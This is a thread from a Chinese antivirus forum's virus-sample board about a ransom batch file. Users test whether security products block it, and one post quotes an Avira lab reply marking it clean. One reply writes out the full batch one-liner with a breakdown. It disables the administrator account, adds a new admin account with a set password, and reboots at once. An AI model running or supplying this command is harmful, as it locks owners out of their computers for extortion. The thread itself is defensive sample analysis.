收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 敲竹杠的成本好低啊 一个批处理 搞定 发这个主要看看各 ...
12345下一页
返回列表 发新帖
楼主: 小柯安全
 收起左侧

[病毒样本] 敲竹杠的成本好低啊 一个批处理 搞定 发这个主要看看各大杀毒主防能不能拦截创建用户

[复制链接]
化石MM
发表于 2014-3-9 14:02:38 | 显示全部楼层
这种东西只要用户名不是admin就可以,用来对付ghost系统的,msdn和正版操作系统根本就是没用
回复

举报

UDady
发表于 2014-3-9 14:14:10 | 显示全部楼层

PF成功拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

hez2010
发表于 2014-3-9 20:43:05 | 显示全部楼层
  1. net user administrator /active:no & net user QQ892807340 1991 /add & net localgroup administrators QQ892807340 /add & shutdown -r -t 0
复制代码


分解:
net user administrator /active:no  ----设置超级管理员用户不可见
net user QQ892807340 1991 /add ----创建一个名为“QQ892807340”的用户
net localgroup administrators QQ892807340 /add  ----设置“QQ892807340”为管理员账户
shutdown -r -t 0 ----延时0秒关机
回复

举报

xdjasd110
发表于 2014-3-10 18:40:42 | 显示全部楼层
wqcaokeyinwq 发表于 2014-3-8 19:40
过微点扫描

是个批处理文件吗?那微点不拦截啊 ?
回复

举报

2314805817
发表于 2014-3-12 17:13:40 | 显示全部楼层
瑞星到现在都还没入库
回复

举报

小柯安全
 楼主| 发表于 2014-3-12 20:24:51 | 显示全部楼层
2314805817 发表于 2014-3-12 17:13
瑞星到现在都还没入库

批处理怎么入库 一般只能靠主防拦截
回复

举报

wqcaokeyinwq
发表于 2014-3-12 20:27:41 | 显示全部楼层
xdjasd110 发表于 2014-3-10 18:40
是个批处理文件吗?那微点不拦截啊 ?

不是所有的批处理微点都能拦截,同样不是所有的批处理微点都不拦截。。你懂得!


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

墨家小子
发表于 2014-3-12 20:53:35 | 显示全部楼层
UDady 发表于 2014-3-9 14:14
PF成功拦截

那里看到拦截了?
回复

举报

2314805817
发表于 2014-3-13 10:45:18 来自手机 | 显示全部楼层
小柯安全 发表于 2014-3-12 20:24
批处理怎么入库 一般只能靠主防拦截

云拉黑
回复

举报

s22962000
发表于 2014-3-14 09:12:45 | 显示全部楼层
Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC01635914.

A listing of files alongside their results can be found below:
File ID        Filename        Size (Byte)        Result
28050111        %E7%82%B9%E5%87%B...BA.bat        134 Byte        CLEAN

Please find a detailed report concerning each individual sample below:
Filename        Result
%E7%82%B9%E5%87%B...BA.bat        CLEAN

The file '%E7%82%B9%E5%87%BB%E5%90%AF%E5%8A%A8%E6%9C%BA%E5%99%A8%E4%BA%BA.bat' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Alternatively you can see the analysis result here:
http://analysis.avira.com/sample ... ;incidentid=1635914

An overview of all your submissions can be found here:
http://analysis.avira.com/sample ... btkXf8LqVtJJmxbrBhs

Please note: If you have specific questions, please visit our website http://www.avira.com/en/support for further details.

Kind regards
Avira Virus Lab

---------------------------------------------
Avira Operations GmbH & Co. KG
Kaplaneiweg 1, 88069 Tettnang, Germany
Phone: +49 (0) 7542-500 0
Fax: +49 (0) 7542-500 3000
Internet: http://www.avira.com
========================================
上報紅傘  竟然說安全
回复

举报

下一页 »
12345下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-22 14:05 , Processed in 0.091440 second(s), 13 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表